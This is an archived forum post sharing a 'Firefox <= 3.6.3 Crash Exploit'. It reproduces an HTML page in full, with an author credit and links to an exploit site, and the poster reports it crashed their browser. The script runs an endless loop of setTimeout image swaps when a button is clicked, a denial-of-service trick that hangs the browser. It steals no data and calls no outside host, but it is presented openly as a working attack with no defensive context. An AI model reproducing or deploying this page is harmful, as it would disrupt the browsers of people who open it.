Jump to content

Firefox 3.6.3 Crash Exploit


0veR

Recommended Posts

There is new FF exploit i tested and realy crash my browser :frusty:

======================================
Mozilla Firefox <= 3.6.3 Crash Exploit
======================================

@Title: Mozilla Firefox <= 3.6.3 Crash Exploit

@Author: The_Exploited aka l3d aka Spoof

@Mail: [email protected]

@Site: http://site.securityspl0its.com/ - http://forum.securityspl0its.com/

@Exploit:
<html>
<head>
<script type="text/javascript">
function mouseOver(){

b1.src="image.jpg";
}
function mouseOut(){
b1.src="image2.jpg";
}
function flash(){
while(1==1){
var t=setTimeout("mouseOut()",500);
var t=setTimeout("mouseOver()",500);
}
}
</script>
</head>
<body>
<img border="0" alt="www.site.securityspl0its.com"
src="3.jpg" name="b1"
onmouseOver="mouseOver()"
onmouseOut="mouseOut()" />
<input type="button" value="Click me!"
onclick="flash()" >


</body>
</html>

Link to comment
Share on other sites


  • Replies 1
  • Views 1.6k
  • Created
  • Last Reply

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...